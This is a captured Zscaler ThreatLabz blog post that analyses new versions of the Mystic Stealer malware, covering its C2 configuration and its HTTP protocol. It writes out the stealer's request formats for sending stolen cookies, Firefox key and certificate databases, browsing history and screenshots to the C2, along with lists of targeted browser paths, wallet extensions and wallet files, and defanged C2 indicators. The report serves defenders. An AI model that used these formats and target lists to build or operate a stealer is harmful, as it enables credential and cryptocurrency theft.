www.zscaler.com
Open in
urlscan Pro
104.18.29.74
Public Scan
URL:
https://www.zscaler.com/blogs/security-research/mystic-stealer-revisited
Submission: On October 26 via api from DE — Scanned from DE
Submission: On October 26 via api from DE — Scanned from DE
Form analysis 3 forms found in the DOM
<form class="topSearch_searchInputWrapper__pYYBt" __bizdiag="107944136" __biza="W___"><input type="text" name="query" class="topSearch_searchInput__N_10L" placeholder="What are you looking for?" aria-label="What are you looking for?"
aria-hidden="true" tabindex="-1" value=""></form><form class="marketoForm_root__OkMwH marketoForm_variant_cta_module__RcBac" id="mktoForm_7971" style="opacity:0" __bizdiag="196539198" __biza="W___"></form><form class="marketoForm_root__OkMwH marketoForm_variant_footer__vL4cA footer-subscription" id="mktoForm_1944" style="opacity:0" __bizdiag="196360362" __biza="W___"></form>Text Content
Press Alt+1 for screen-reader mode, Alt+0 to cancelAccessibility Screen-Reader
Guide, Feedback, and Issue Reporting
This site uses JavaScript to provide a number of functions, to use this site
please enable JavaScript in your browser.
Live Global Events: Secure, Simplify, and Transform Your Business.
See Agenda and Locations
Close
OpenSearch
CXO REvolutionariesCareersPartnersSupport
ShowContact UsOptions
Get in touch1-408-533-0288Chat with us
ShowSign InOptions
admin.zscaler.netadmin.zscalerone.netadmin.zscalertwo.netadmin.zscalerthree.netadmin.zscalerbeta.netadmin.zscloud.netZscaler
Private Access
Home
The Zscaler ExperienceProducts & SolutionsPlatformResourcesCompany
Request a demoopen search
open navigation
The Zscaler Experience
Zscaler: A Leader in the 2023 Gartner® Magic Quadrant™ for Security Service Edge
(SSE)
Get the full report
Your world, secured
Experience the transformative power of zero trust.
The Zscaler Difference
The Zscaler Difference
Experience the World’s Largest Security Cloud
Customer Success Stories
Analyst Recognition
Machine Learning and AI at Zscaler
Reduce Your Carbon Footprint
Zero Trust Fundamentals
Zero Trust Fundamentals
What is Zero Trust?
What Is Security Service Edge (SSE)?
What Is Secure Access Service Edge (SASE)?
What Is Zero Trust Network Access (ZTNA)?
What Is Secure Web Gateway (SWG)?
What Is Cloud Access Security Broker (CASB)?
What Is Cloud Native Application Protection Platform (CNAPP)?
Zero Trust Resources
Products & Solutions
Secure Your Users
Provide users with seamless, secure, reliable access to applications and data.
Secure Your Workloads
Build and run secure cloud apps, enable zero trust cloud connectivity, and
protect workloads from data center to cloud.
Secure Your IoT and OT
Provide zero trust connectivity for IoT and OT devices and secure remote access
to OT systems.
Products
Products
Transform your organization with 100% cloud native services
Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Data Protection (CASB/DLP)
Digital Experience (ZDX)
Posture Control
Partner IntegrationsIndustry and Market Solutions
Solution Areas
Solution Areas
Propel your business with zero trust solutions that secure and connect your
resources
Stop Cyberattacks
Protect Data
Zero Trust App Access
VPN Alternative
Accelerate M&A Integration
Optimize Digital Experiences
Zero Trust Branch Connectivity
Build and Run Secure Cloud Apps
Zero Trust Cloud Connectivity
Zero Trust for IoT/OT
Zero Trust for Private 5G
Find a product or solution
Platform
Zero Trust Exchange Platform
Learn how Zscaler delivers zero trust with a cloud native platform that is the
world’s largest security cloud
Zero Trust Exchange PlatformTitle Link
Transform with Zero Trust Architecture
Transform with Zero Trust Architecture
Propel your transformation journey
Secure Digital Transformation
Network Transformation
Application Transformation
Security Transformation
Secure Your Business Goals
Secure Your Business Goals
Achieve your business and IT initiatives
Ensure Secure Business Continuity
Accelerate M&A and Divestitures
Recession-Proof Your Enterprise
Secure Your Hybrid Workforce
Download Zscaler Client Connectors
Resources
Learn, connect, and get support.
Explore tools and resources to accelerate your transformation and secure your
world
Learn, connect, and get support.Title Link
Amplifying the voices of real-world digital and zero trust pioneers
Visit now
Resource Center
Resource Center
Stay up to date on best practices
Resource Library
Blog
Customer Success Stories
Webinars & Demos
Zpedia
Events & Trainings
Events & Trainings
Find programs, certifications, and events
Upcoming Events
Zenith Live
Zscaler Academy
Interactive Zscaler Whiteboard Workshop
Security Research & Services
Security Research & Services
Get research and insights at your fingertips
ThreatLabz Analytics
Tools
Tools
Tools designed for you
Security Preview
Security and Risk Assessment
Security Advisory Updates
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support
Community & Support
Connect and find support
Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Download Zscaler Client Connector
Industry & Market Solutions
Industry & Market Solutions
See solutions for your industry and country
Public Sector
Healthcare
Financial Services
Education
See all
Resource Center
Resource Center
Stay up to date on best practices
Resource Library
Blog
Customer Success Stories
Webinars & Demos
Zpedia
Events & Trainings
Events & Trainings
Find programs, certifications, and events
Upcoming Events
Zenith Live
Zscaler Academy
Interactive Zscaler Whiteboard Workshop
Security Research & Services
Security Research & Services
Get research and insights at your fingertips
ThreatLabz Analytics
Tools
Tools
Tools designed for you
Security Preview
Security and Risk Assessment
Security Advisory Updates
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support
Community & Support
Connect and find support
Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Download Zscaler Client Connector
Industry & Market Solutions
Industry & Market Solutions
See solutions for your industry and country
Public Sector
Healthcare
Financial Services
Education
See all
Company
About Zscaler
Discover how it began and where it’s going
Partners
Meet our partners and explore system integrators and technology alliances
News & Announcements
Stay up to date with the latest news
Leadership Team
Meet our management team
Partner Integrations
Explore best-in-class partner integrations to help you accelerate digital
transformation
Investor Relations
See news, stock information, and quarterly reports
Environmental, Social & Governance
Learn about our ESG approach
Careers
Join our mission
Press Center
Find everything you need to cover Zscaler
Compliance
Understand our adherence to rigorous standards
Zenith Ventures
Understand our adherence to rigorous standards
ZSCALER BLOG
Get the latest Zscaler blog updates in your inbox
Subscribe
Security Research
MYSTIC STEALER REVISITED
JAVIER VICENTE - Sr. Staff Security Researcher
October 25, 2023 - 21 min read
Threatlabz Research
Contents
1. Introduction
2. Key Takeaways
3. Technical Analysis
4. Communications
5. Conclusion
6. Cloud Sandbox
7. Indicators of Compromise (IoCs)
8. Appendix
9. More blogs
Copy URL
Copy URL
INTRODUCTION
Mystic Stealer is a relatively new downloader and information stealer that
emerged in early 2023. The malware harvests data from a large number of web
browsers and cryptocurrency wallet applications. Mystic can also be used to
steal Steam game credentials and arbitrary files from an infected system. Mystic
stands out for the level of obfuscation and improvements with each new version
of the malware. The code continues to evolve and expand the data theft
capabilities and the network communication was updated from a custom binary
TCP-based protocol to an HTTP-based protocol. The shift to HTTP may be due to
Mystic Stealer failing to beacon back to a C2 server in corporate environments,
which frequently block network traffic on non-standard ports. The new
modifications have led to increased popularity with criminal threat actors
leveraging its loader functionality to distribute additional malware families
including RedLine, DarkGate, and GCleaner.
In this blog, we will analyze the latest updates to Mystic Stealer as a
follow-up to our previous report.
KEY TAKEAWAYS
* Mystic Stealer is an information stealer that was first advertised in April
2023, which targets nearly 40 web browsers and more than 70 browser
extensions.
* Mystic Stealer has been regularly updated with improvements to its code
obfuscation, configuration, and methods of communication.
* The malware’s command and control (C2) communications have been updated from
a custom encrypted binary protocol to HTTP.
* Mystic Stealer has added loader functionality in recent versions to
complement its information stealing abilities.
* Mystic Stealer has been used by numerous threat groups that leverage it to
distribute second-stage malware payloads including RedLine, DarkGate, and
GCleaner.
TECHNICAL ANALYSIS
The latest variant of Mystic Stealer has introduced some notable changes in both
the behavior of the malware and in the obfuscation. The entry point of the
malware is very similar to the older variant. The malware exits if the current
date is older than a specific hardcoded date. Figure 1 shows a comparison of the
main function between the previous variant and the current variant.
Figure 1: Comparison of the WinMain function for the current and previous Mystic
variants
In the latest variant of Mystic Stealer, the decryption of the malware C2s has
been moved to a sub-function that is executed after the expiration date
(probably to avoid leaking the C2s in memory if this time check fails).
EMBEDDED C2 CONFIGURATION
The algorithm used to decrypt the list of C2 is the same custom XTEA-based
algorithm as the previous variant. However, after the custom XTEA layer has been
decrypted, there is a sequence of HTTP C2s, separated by a “|” delimiter. The C2
path is stored among the list of obfuscated strings that are constructed and
decoded using the stack as shown in Figure 2.
Figure 2. Mystic Stealer C2 path obfuscation
INFORMATION STEALING CONFIGURATION
In the previous Mystic Stealer variant, the target lists for web browsers,
extensions (and their IDs), and cryptocurrency applications were embedded and
obfuscated in the malware. In recent versions, the application target list is
now downloaded from the C2 server instead of being hardcoded, as we will examine
in the following section.
COMMUNICATIONS
In the latest Mystic Stealer variant, all communications between the infected
system and the C2 server are performed using HTTP POST requests. Unlike the
previous variant that used RC4 to encrypt a custom binary TCP-based protocol,
the latest variant does not implement any form of encryption. The data sent in
the POST query is Base64 encoded, as shown below:
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="<name>"
BASE64(<data>)
--<boundary>
--------------------------------------------------------------------------------
The response data from the server is also encoded in Base64. The response starts
with “OK\r\n” and is followed by any data returned by the C2 server for the
specific query.
--------------------------------------------------------------------------------
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK <rest of data for the specific command, if necessary>)
--------------------------------------------------------------------------------
REGISTRATION
The infected system (bot) starts communication with the C2 server by sending a
POST request with data containing a variable named hwid, which includes a Base64
encoded bot ID generated based on information from the victim’s machine. A
second variable with the name build contains the botnet ID, a value that is
hardcoded in the binary of the malware. Once the C2 receives these initial two
packets, the bot is registered.
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="hwid"
BASE64(0123456789ABCDEF123456)
--<boundary>
Content-Disposition: form-data; name="build"
BASE64(botnet_id)
--<boundary>--
--------------------------------------------------------------------------------
The C2 server generates and returns a session token (a 64 byte lowercase
hexadecimal string) that will be used in subsequent packets, together with a set
of binary flags that indicates which actions should be performed (take a
screenshot, steal browser credentials, steal cryptocurrency wallets, etc).
--------------------------------------------------------------------------------
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK <token>1|1|1|1|0|1|1|1|0|1|1)
--------------------------------------------------------------------------------
When the bot submits information to the C2 server, it sends a POST request with:
* A filename variable containing the name of the file being submitted, Base64
encoded
* A file variable with the content of the file, also Base64 encoded
* A token variable with the session token from the registration request
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("example.txt")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of example.txt>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
--------------------------------------------------------------------------------
If the request is valid, the server answers with an OK response.
After registration, the bot sends information about the infected system via a
file named SystemInformation.txt that contains information similar to the
following:
--------------------------------------------------------------------------------
Build mark: zzzz
IP: {ip}
File Location: C:\Users\xxxx\AppData\Local\Temp\aaaa\bbbb.exe
UserName: xxxx
ComputerName: XXXX
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}
HWID: 0123456789ABCDEF012345
Current language: English (United States)
ScreenSize: 1792x1120
Operation System: Windows 10 Pro x64
Available KeyboardLayouts:
English (United States)
Hardwares:
CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz
GPU: VMware SVGA 3D
RAM: 4293898240ll
--------------------------------------------------------------------------------
INFORMATION STEALING
Once Mystic Stealer has registered and reported the infected system information,
the binary flags from the C2 server determine whether to conduct data theft and
load additional malware payloads. Mystic Stealer sends HTTP POST requests for
specific target lists by specifying the value in a msg variable.
BROWSERS
Depending on the configuration, Mystic Stealer will steal data from
Chromium-based browsers by first requesting a target list from the C2 server.
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("chromium-browsers")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
--------------------------------------------------------------------------------
The Mystic Stealer C2 server will respond with a list of Chromium-based browsers
to target. The Appendix section shows the full list of browsers that have been
targeted.
--------------------------------------------------------------------------------
Citrio|%localappdata%\CatalinaGroup\Citrio\User
Data|Coowon|%localappdata%\Coowon\Coowon\User
Data|Liebao|%localappdata%\liebao\User
Data|QIP Surf|%localappdata%\QIP Surf\User
Data|Orbitum|%localappdata%\Orbitum\User
Data|Comodo Dragon|%localappdata%\Comodo\Dragon\User
Data|Amigo|%localappdata%\Amigo\User\User
Data|Torch|%localappdata%\Torch\User Data|Yandex
Browser|%localappdata%\Yandex\YandexBrowser\User
Data|Comodo|%localappdata%\Comodo\User
Data|360Browser|%localappdata%\360Browser\Browser\User
Data|Maxthon3|%localappdata%\Maxthon3\User Data|K-Melon|...
--------------------------------------------------------------------------------
Each element of the list contains the name of the browser and the path where the
browser’s data is stored:
--------------------------------------------------------------------------------
Browser name 1|Browser path 1|..............|Browser N|Browser path N
--------------------------------------------------------------------------------
Mystic Stealer also retrieves a list of browser extensions to target.
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64(extensions)
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
--------------------------------------------------------------------------------
The Mystic Stealer C2 server will return the browser extensions configuration.
--------------------------------------------------------------------------------
Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad|Guarda|hpglfhgfnhbgpjdenjgmdg
oeiappafln|EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac|Jaxx
Liberty|cjelfplplebdjjenllpjcblmjkfcffne|BitApp
Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi|iWallet|kncchdigobghenbbaddoj
jnnaogfppfj|Wombat|amkmjjmmflddogmhpjloimipbofnfjih|MEW
CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|GuildWallet|nanjmdknhkinifnkgdcgg
cfnhdaammmj|Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig|Ronin
Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|NeoLine|cphhlgmgameodnhkjdmkp
anlelnlohao|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|Liquality
Wallet|kpfopkelmapcoipemfendmdcghnegimn|Terra
Station|aiifbnbfobpmeekipheeijimdpnlpgpp|Keplr|dmkamcknogkgcdfhhbddcg
hachkejeap|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|...
--------------------------------------------------------------------------------
In this case, each element contains the name of the extension and the ID.
--------------------------------------------------------------------------------
Extension name 1|Extension ID 1|....|Extension name N|Extension ID N
--------------------------------------------------------------------------------
Next, the malware downloads the legitimate sqlite3.dll DLL from the C2 server.
This library is used to parse web browser SQLite database files.
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("sqlite3")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
--------------------------------------------------------------------------------
The response is the sqlite3 DLL Base64 encoded, as shown below:
--------------------------------------------------------------------------------
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK BASE64(<sqlite3 file>))
--------------------------------------------------------------------------------
The stolen browser data (if any) is sent to the C2 server. For example, cookies
stolen from Microsoft Edge (which is Chromium-based) would be exfiltrated, as
shown below:
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64(“Cookies/Microsoft_Edge_Default.txt”)
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Cookies/Microsoft_Edge_Default.txt>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
--------------------------------------------------------------------------------
Depending on the configuration, Mystic Stealer will also retrieve a list
gecko-browsers to target.
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("gecko-browsers")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
--------------------------------------------------------------------------------
The configuration format is identical to the chromium-browser list.
--------------------------------------------------------------------------------
Firefox|%appdata%\Mozilla\Firefox\Profiles|Comodo
IceDragon|%appdata%\Comodo\IceDragon\Profiles|BlackHawk|%appdata%\NET
GATE
Technologies\BlackHawk\Profiles|Cyber
fox|%appdata%\8pecxstudios\Cyberfox\Profiles|K-Meleon|%appdata%\K-Meleon\Profiles|Icecat|%appdata%\Mo
zilla\icecat\Profiles
--------------------------------------------------------------------------------
Mystic Stealer will collect a number of database files from Firefox-based
browsers containing cookies, certificates, keys, etc., as shown below:
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("Gecko/Firefox/<profile>.default/key4.db")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Gecko/Firefox/<profile>.default/key4.db>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK)
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("Gecko/Firefox/<profile>.default/cert9.db")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Gecko/Firefox/<profile>.default/cert9.db>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK)
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("Cookies/Firefox_<profile>.default.txt")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Cookies/Firefox_<profile>.default.txt>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK)
--------------------------------------------------------------------------------
If the browser history configuration flag (position 4) is set to 1, Mystic
Stealer also sends the victim’s browsing history.
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("History/Firefox_8qjvd3qg.default-release.txt")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of History/Firefox_8qjvd3qg.default-release.txt>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
--------------------------------------------------------------------------------
The browser history file contains the website title (if available) and the URL
as shown below:
--------------------------------------------------------------------------------
Title: <Title1>
Url: <url1>
===============
Title: <Title2>
Url: <url2>
===============
...
===============
Title: <TitleN>
Url: <urlN>
===============
--------------------------------------------------------------------------------
SCREENSHOTS
If the screenshot configuration flag (position 8) is set to 1, Mystic Stealer
captures and sends a screenshot of the victim’s desktop.
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("Screenshot.jpeg")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Screenshot.jpeg>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
--------------------------------------------------------------------------------
FILES
Mystic Stealer also downloads a list of files to be stolen from the victim.
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("files")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
--------------------------------------------------------------------------------
The Mystic Stealer C2 server returns a list of target files and directories to
steal. For example, ThreatLabz has observed this feature used to steal
cryptocurrency wallets as shown below:
--------------------------------------------------------------------------------
Wallets/Jaxx
Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveld
b|*.*|0|Wallets/Atomic|%appdata%\atomic\Local
Storage\leveldb|*.*|0|Wallets/Binance|%appdata%\Binance|app-store.jso
n,simple-storage.json,.finger-print.fp|0|Wallets/Co
inomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0|Wallets/Exo
dus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info
.seco|1|Wallets/Bitcoin
Core|%appdata%\Bitcoin\wallets|wallet.dat|1|Wallets/Bitcoin Core
Old|%appdata%\Bitcoin|*wallet*.dat|0|Wallets/Dogecoin|%appdata%\Bitco
in\wallets|*wallet*.dat|0|Wallets/Raven
Core|%appdata%\Raven|*wallet*.dat|0|Wallets/Daedalus
Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0|Wallets/Blockstream
Green|%appdata%\Blockstream\Green\wallets|*.*|1|Wallets/Wasabi
Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0|Wallets/Ethereu
m|%appdata%\Ethereum|keystore|0|Wallets/Electrum|%appdata%\Electrum\w
allets|*.*|0|Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
|Wallets/Electron
Cash|%appdata%\ElectronCash\wallets|*.*|0|Wallets/MultiDoge|%appdata%
\MultiDoge|multidoge.wallet|0|Wallets/Jaxx Desktop
Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0
--------------------------------------------------------------------------------
The format for each targeted file is shown below:
--------------------------------------------------------------------------------
Directory name|Location on disk|Target files mask|Flag
--------------------------------------------------------------------------------
The flag parameter indicates whether Mystic Stealer should recursively search
the target directory. Once finished, a “done” msg is sent, to indicate the file
stealing task is finished.
LOADER
A “loader” msg can be sent by Mystic Stealer to the C2 server to request
additional second-stage malware payloads, as shown below:
--------------------------------------------------------------------------------
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("loader")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK |1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN))
--------------------------------------------------------------------------------
The response to the loader request is an initial Base64 encoded layer containing
an OK response with a set of one or more Base64 encoded executables:
Figure 3: Base64 encoded executables downloaded by Mystic Stealer
The packet follows this format:
--------------------------------------------------------------------------------
|1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN)
--------------------------------------------------------------------------------
The parameter that precedes the Base64 encoded executable does not appear to be
currently used, although it may indicate a potential feature that has yet to be
implemented such as whether to write the binary to disk or inject it into
another process. After downloading and executing these binary payloads, Mystic
Stealer sends a final POST request with the message “loadercode”. The C2 server
will then return an empty response.
DEBUG BUILDS
Zscaler ThreatLabz has found recent samples compiled in September and October
2023, which contain plaintext strings that typically are obfuscated in other
samples:
Figure 4: Mystic Stealer debug version plaintext strings
In addition, these samples have string references with full file paths (instead
of a relative path like ..\\chromiumbrowsers.cpp in non-debug samples) to the
original C++ code. Interestingly, the username in these full paths is will.
ThreatLabz suspects these samples are compiled from code that is still in
development where they could be testing improvements and new features.
CONCLUSION
Even though Mystic Stealer is a relatively new information stealing malware,
ThreatLabz has observed a significant increase in threat actors leveraging it to
deploy additional malware. The developer behind Mystic Stealer is continuously
modifying and improving the code, and the malware is quickly evolving. The C2
communication protocol used by Mystic Stealer has switched from a custom binary
protocol to an HTTP-based protocol, likely to improve beaconing from infections
in corporate environments that leverage firewalls to filter suspicious network
traffic. Based on the number of new Mystic Stealer samples and C2 panels, the
malware is likely to continue to pose a threat to organizations.
In addition to staying on top of these threats, Zscaler's ThreatLabz team
continuously monitors for new threats and shares its findings with the wider
community.
CLOUD SANDBOX
Zscaler’s multilayered cloud security platform detects indicators related to
Mystic Stealer at various levels.
INDICATORS OF COMPROMISE (IOCS)
HashFirst SeenExpiration DateBotnet IDC2
6203249bebf7248535ff5ef70a7c5a57
688b399d91ac63c9d73441af6e65f184
2023-10-08 08:36:29 UTC2023-11-09T20:02:2115
hxxp://171.22.28[.]235/loghub/master
7eb8617d09f204dd40541a000f98810
19ff103ff330cb0e7aebb8c3a160cfd26
2023-09-29 15:30:00 UTC2023-10-26T11:48:42Chung
hxxp://194.87.31[.]123/loghub/master
21a8db193093caf6acbcd14ba64c9
8a1c9f16998cade8f60fa0fb4dc63e33bd2
2023-09-18 21:36:22 UTC2023-09-22T12:35:08mema
hxxp://5.42.92[.]211/loghub/master
7003eadaef73ac1f2e0f0a86a3d1f57
92a5dde3a45ba71e095861b55059b3780
2023-09-07 07:53:28 UTC2023-09-12T20:08:32tresk
hxxp://5.42.92[.]211/loghub/master
00fe26cfe465740e61b99f105bcf251
6ff49e117f23f4b508d5256c57fa3fc66
2023-06-26 05:51:47 UTC2023-07-24T18:48:13sup
hxxp://188.40.116[.]251:8005/loghub/master
APPENDIX
DECRYPTED MALWARE STRINGS
* %08lX%04lX%lu
* %ix%i
* %ls %ls
* %ls [%ls %d] ERROR in %s, line %d, function %s. %s
* %ls\\%ls
* %ls\\%ls\\Local State
* %ls\\*
* %ls\\Web Data
* %ls\\cookies.sqlite
* %ls\\formhistory.sqlite
* %ls\\places.sqlite
* %s/%s
* %userprofile%\\Telegram Desktop\\tdata
* &&\" **(# +
* &0'fg{199
* (ov_(ov
* ,+& ##*
* -t{d2
